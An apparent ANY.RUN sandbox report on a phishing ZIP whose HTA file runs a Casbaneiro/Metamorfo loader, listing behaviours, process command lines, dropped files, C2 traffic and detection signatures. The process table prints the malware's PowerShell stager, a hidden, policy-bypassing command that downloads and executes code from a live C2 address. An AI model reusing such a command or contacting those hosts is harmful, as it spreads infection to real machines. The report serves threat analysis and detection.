File name: Adjuntos04-Junio.PDF-TJBNKHP.zip

Full analysis: https://app.any.run/tasks/b759071e-9cbf-40c8-ad68-876e28b5850b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 04, 2024, 20:25:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
casbaneiro
metamorfo
uac
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: 82003AA5C6D6E08678709848218B85B2
SHA1: A03407FBFCE6CBB7052C14311C53252F13A53AB0
SHA256: 12DF42601CCD2DF232BF3667E1E12F8B11D79F55D9787AE9A824694A4ECE4AF2
SSDEEP: 12:5jn4K3HxatsaS09HpljpBCgAhL9cG1LTB56LgNe4HjIDEBTkBHXGNennbMAcnFkG:9nH3HIWC3ADTB5NNeKTgGinEnFkUm0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1424)
    • Changes powershell execution policy (Bypass)

      • mshta.exe (PID: 1756)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1424)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 1424)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)
    • Connects to the CnC server

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Create files in the Startup directory

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • CASBANEIRO has been detected (SURICATA)

      • powershell.exe (PID: 1424)
    • Bypass User Account Control (Modify registry)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 2208)
  • SUSPICIOUS

    • Reads the Internet Settings

      • rundll32.exe (PID: 4072)
      • mshta.exe (PID: 1756)
      • powershell.exe (PID: 1424)
      • sipnotify.exe (PID: 2044)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • sipnotify.exe (PID: 1888)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Found IP address in command line

      • powershell.exe (PID: 1424)
    • Starts POWERSHELL.EXE for command execution

      • mshta.exe (PID: 1756)
      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)
    • Probably downloads files using WebClient

      • mshta.exe (PID: 1756)
    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 1756)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 1756)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Connects to the server without a host name

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • The system shuts down or reboots

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • The process executes via Task Scheduler

      • sipnotify.exe (PID: 2044)
      • ctfmon.exe (PID: 1692)
      • ctfmon.exe (PID: 1596)
      • sipnotify.exe (PID: 1888)
    • Changes default file association

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
    • Starts CMD.EXE for command execution

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)
    • Application launched itself

      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)
    • Reads settings of System Certificates

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2208)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 2208)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 2208)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2208)
  • INFO

    • Manual execution by a user

      • notepad.exe (PID: 124)
      • rundll32.exe (PID: 4072)
      • notepad.exe (PID: 1872)
      • notepad.exe (PID: 2040)
      • mshta.exe (PID: 1756)
      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2136)
      • IMEKLMG.EXE (PID: 2128)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2156)
      • wmpnscfg.exe (PID: 2736)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2808)
      • wmpnscfg.exe (PID: 2784)
    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 4072)
      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
    • Checks proxy server information

      • mshta.exe (PID: 1756)
    • Checks supported languages

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2736)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 1756)
    • Disables trace logs

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
    • Reads the computer name

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2764)
      • wmpnscfg.exe (PID: 2736)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
    • Process checks whether UAC notifications are on

      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
    • Reads the software policy settings

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2024:06:04 17:36:52
ZipCRC: 0x85adba13
ZipCompressedSize: 520
ZipUncompressedSize: 1120
ZipFileName: Adjuntos04-Junio.PDF-TJBNKHP.hta
No data.
All screenshots are available in the full report
Total processes
172
Monitored processes
36
Malicious processes
9
Suspicious processes
3

Behavior graph

Graph nodes, in the order shown: start, winrar.exe (no specs), rundll32.exe (no specs), notepad.exe (no specs), notepad.exe (no specs), notepad.exe (no specs), notepad.exe (no specs), mshta.exe (#CASBANEIRO), powershell.exe, wmpnscfg.exe (no specs), shutdown.exe (no specs), ctfmon.exe (no specs), sipnotify.exe, imeklmg.exe (no specs), imeklmg.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), powershell.exe, cmd.exe (no specs), cmd.exe (no specs), powershell.exe, wmpnscfg.exe (no specs), wmpnscfg.exe (no specs), shutdown.exe (no specs), ctfmon.exe (no specs), sipnotify.exe, imeklmg.exe (no specs), imeklmg.exe (no specs), cmd.exe (no specs), _uhcrtd3_yi7.exe, cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), powershell.exe, powershell.exe, wmpnscfg.exe (no specs), wmpnscfg.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 124
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1200
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta
Path: C:\Windows\System32\notepad.exe
Parent process: rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1212
CMD: "C:\Windows\system32\shutdown.exe" /r /t 15
Path: C:\Windows\System32\shutdown.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\shutdown.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\secur32.dll
PID: 1424
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (new-object net.webclient).downloadstring('http://94.131.117.72/ldvb/pw')"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1596
CMD: C:\Windows\System32\ctfmon.exe
Path: C:\Windows\System32\ctfmon.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 1692
CMD: C:\Windows\System32\ctfmon.exe
Path: C:\Windows\System32\ctfmon.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Exit code:
1073807364
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 1756
CMD: "C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta"
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
PID: 1872
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1888
CMD: C:\Windows\system32\sipnotify.exe -LogonOrUnlock
Path: C:\Windows\System32\sipnotify.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
sipnotify
Exit code:
0
Version:
6.1.7602.20480 (win7sp1_ldr_escrow.191010-1716)
Modules
Images
c:\windows\system32\sipnotify.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1932
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
43 806
Read events
43 482
Write events
287
Delete events
37

Modification events

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Adjuntos04-Junio.PDF-TJBNKHP.zip

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120
Executable files
6
Suspicious files
24
Text files
24
Unknown types
3

Dropped files

PID | Process | Filename | Type
3968 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3968.10349\Adjuntos04-Junio.PDF-TJBNKHP.hta | html
  MD5: 8A309B30AEB277EB7A2363484EBE804C
  SHA256: C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
3968 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3968.11125\Adjuntos04-Junio.PDF-TJBNKHP.hta | html
  MD5: 8A309B30AEB277EB7A2363484EBE804C
  SHA256: C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
1424 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_H.lnk | lnk
  MD5: 3A108A7761EEA26A9D4B6D089AF234F6
  SHA256: E0788EC623FE8179341E75B34BC4A8E215CDAE15C48F66681D7E085787C9C5A4
1424 | powershell.exe | C:\users\public\USER-PC_dcpgky3_H.cmd | text
  MD5: 9FA1754C03684ADD2F1317071460E448
  SHA256: 64C97EB830AC01D67F7C732EF35601DBA32CA831909FB0456CC7FCADD2C9C69F
1424 | powershell.exe | C:\_dcpgky3_H\USER-PC_dcpgky3_H | text
  MD5: F33BB3F1B71C05FC8DAA3B0908BE3DCA
  SHA256: EBDA232FC01D4837B77EC30597945B103B45245714A6FE6AFE0D198010F21195
1424 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_HAA.lnk | lnk
  MD5: E8C4A48495A8741F4C4D3CA77AA9E812
  SHA256: 3E80267167AA0CBC78125BF5F01DD56712A4F839B01E9DBB213D177D6A0596BC
1424 | powershell.exe | C:\_dcpgky3_H\USER-PC_dcpgky3_Hy | text
  MD5: 9C2D3D09140EEEB2EFE40F876D44E1B0
  SHA256: 72B3480265246FB30775BD6C6DF814C48D07FF8A2AF3CD3BB28AC61119D88734
1424 | powershell.exe | C:\users\public\USER-PC_dcpgky3_Hy.cmd | text
  MD5: B413EB5015261C32E1A9AA55E600095F
  SHA256: DCA65B434D4238F75EF155C1CD668A60E21DEF515FBE9699D7478BD6FDD2C739
1424 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_Hy.lnk | lnk
  MD5: B4FD7691CFB396BB4FBEC931BBC63558
  SHA256: FDE793C0F0B180A14125FE0F342391A2B8513E0A3FF89DB03D6B25E61F6FF87B
1424 | powershell.exe | C:\users\public\L21 | text
  MD5: 4F983E0A4F63B6E6FBFC52A387A66CBF
  SHA256: 0432CC95843F7A506114B7643C41796B7DE5A6864D926C91636644554F71788E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
38
DNS requests
12
Threats
14

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1424 | powershell.exe | GET | 200 | 94.131.117.72:80 | http://94.131.117.72/ldvb/pw | unknown | unknown
1424 | powershell.exe | GET | 200 | 94.131.117.72:80 | http://94.131.117.72/ldvb/0105 | unknown | unknown
2044 | sipnotify.exe | HEAD | 200 | 88.221.61.151:80 | http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620100584530000 | unknown | unknown
1424 | powershell.exe | POST | 200 | 94.131.117.72:80 | http://94.131.117.72/ldht/index.php | unknown | unknown
2044 | sipnotify.exe | HEAD | 200 | 88.221.61.151:80 | http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620101195930000 | unknown | unknown
1392 | svchost.exe | GET | 304 | 217.20.57.18:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?59c6d662c26e01b9 | unknown | unknown
1392 | svchost.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | unknown
1072 | svchost.exe | GET | 304 | 217.20.57.18:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?90423d3b50428e59 | unknown | unknown
1392 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown
2208 | powershell.exe | POST | 200 | 86.38.217.167:80 | http://86.38.217.167/ps1/index.php | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
1088 | svchost.exe | 224.0.0.252:5355 | | | | unknown
1756 | mshta.exe | 94.131.117.72:80 | | ZAYO-6461 | US | unknown
1424 | powershell.exe | 94.131.117.72:80 | | ZAYO-6461 | US | unknown
1100 | svchost.exe | 224.0.0.252:5355 | | | | unknown
1460 | svchost.exe | 239.255.255.250:3702 | | | | unknown
2044 | sipnotify.exe | 88.221.61.151:80 | query.prod.cms.rt.microsoft.com | AKAMAI-AS | DE | unknown
2208 | powershell.exe | 93.127.200.211:443 | fsnat.shop | diva-e Datacenters GmbH | DE | unknown
2448 | powershell.exe | 93.127.200.211:443 | fsnat.shop | diva-e Datacenters GmbH | DE | unknown

DNS requests

Domain
IP
Reputation
query.prod.cms.rt.microsoft.com
  • 88.221.61.151
whitelisted
fsnat.shop
  • 93.127.200.211
unknown
firebasestorage.googleapis.com
  • 142.250.181.234
  • 216.58.206.42
  • 172.217.16.138
  • 142.250.186.106
  • 142.250.185.202
  • 172.217.16.202
  • 142.250.184.234
  • 142.250.74.202
  • 142.250.185.234
  • 142.250.184.202
  • 142.250.186.74
  • 142.250.186.42
  • 172.217.18.10
  • 142.250.186.170
  • 216.58.206.74
  • 142.250.185.170
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
ctldl.windowsupdate.com
  • 217.20.57.18
  • 217.20.57.34
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
1424
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-WmiObject Cmdlet was detected
1424
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Casbaneiro Server Response (Metamorfo)
1424
powershell.exe
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
1424
powershell.exe
A Network Trojan was detected
ET MALWARE Horabot Payload Inbound
2208
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1756
mshta.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
1756
mshta.exe
Potentially Bad Traffic
ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
7 ETPRO signatures available at the full report
No debug info